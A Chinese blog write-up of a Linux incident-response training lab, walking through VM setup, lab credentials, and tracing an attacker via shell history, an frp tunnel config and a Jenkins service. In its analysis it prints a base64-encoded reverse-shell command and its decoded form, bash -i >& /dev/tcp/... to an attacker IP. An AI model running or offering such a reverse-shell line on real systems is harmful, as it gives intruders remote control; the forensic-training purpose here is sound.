知工善防Linux-应急响应靶场 - easy溯源WriteUP

AI-摘要
28.7Blog GPT
AI初始化中...
介绍自己 🙈
生成本文简介 👋
推荐相关文章 📖
前往主页 🏠
前往爱发电购买
知工善防Linux-应急响应靶场 - easy溯源WriteUP
28.7的博客应急响应靶场 - easy溯源 操作指南与题目解析
一、靶场准备步骤
在启动靶机前,需完成以下配置,确保VMware可正常加载靶机。
1. VMX文件版本适配
靶机压缩包解压后,需根据本地VMware版本修改虚拟机配置文件:
- 找到文件
应急响应靶场 - easy溯源.vmx - 用记事本/Notepad++打开,找到行
virtualHW.version = "21" - 将版本号
21改为与本地VMware兼容的版本(示例中改为17,具体版本需根据自身VMware版本调整)
2. 靶机基础账户信息
靶机默认提供普通用户账户,用于初始登录:
- 账户名:zgsfsys
- 密码:zgsfsys
3. 修改root密码
题目未提供root密码,需通过普通用户登录后修改,操作命令如下:
1 | # 执行sudo命令修改root密码,先输入当前普通用户密码(zgsfsys)验证权限 |
4. 初始信息查看
打开靶机后,首先查看桌面的 password.txt 文件,记录其中的Web服务地址与账户,后续可能用到:
1 | 1. https://127.0.0.1:15493/c536062c |
二、题目解析与解答
1. 攻击者内网跳板机IP地址
分析过程
- 以普通用户
zgsfsys身份登录靶机,执行history命令查看历史操作记录,发现关键命令:1
2# 历史记录中存在一条base64编码的反弹shell命令
55 echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExLjEyOS8xMjM0IDA+JjE= | base64 --decode | bash - 对编码内容进行Base64解密,得到原始反弹shell命令:
1
2# 解密后命令(指向攻击者内网跳板机IP和端口)
bash -i >& /dev/tcp/192.168.11.129/1234 0>&1 - 命令中
/dev/tcp/后的IP192.168.11.129即为攻击者内网跳板机IP。
答案
2. 攻击者服务器地址
分析过程
- 切换至root用户(使用步骤1.3中修改的root密码),通常恶意配置文件会藏于
/root、/home或服务目录下。 - 在
/root/chuantou/目录下找到frpc.toml文件(frp是常见的内网穿透工具,用于连接攻击者服务器)。 - 打开
frpc.toml文件,其中记录的远程服务器IP即为攻击者服务器地址。
答案
3. 存在漏洞的服务(提示:7个字符)
分析过程
- 查看普通用户
zgsfsys的历史操作,发现多条查看Jenkins日志的命令,暗示Jenkins服务可能存在异常:1
2
3# 查看Jenkins日志,可能在寻找后门密码或漏洞利用痕迹
sudo cat /var/log/jenkins/jenkins.log
sudo cat /var/log/jenkins/jenkins.log | grep 12 - 结合浏览器记录,发现靶机曾访问过Jenkins服务(默认端口8080),需将日志中的
127.0.0.1替换为靶机实际DHCP分配的IP(如192.168.11.130),访问http://[靶机IP]:8080可打开Jenkins页面。
- 使用Wappalyzer工具分析页面指纹,确认服务为Jenkins,且字符数为7,符合提示要求。
答案
4. 攻击者留下的flag(格式zgsf{})
分析过程
- 访问Jenkins服务(
http://[靶机IP]:8080),在页面中直接找到攻击者留下的flag信息。 - flag格式符合
zgsf{}要求,内容与靶场标识相关。
答案
5. 攻击者邮箱地址 & 6. 攻击者的ID名称
说明
经全面排查靶机文件(如日志、配置文件、用户目录、Web服务目录等),未发现与“攻击者邮箱地址”和“攻击者ID名称”相关的有效信息,目前暂无解。
评论
匿名评论隐私政策
✅ 你无需删除空行,直接评论以获取最佳展示效果















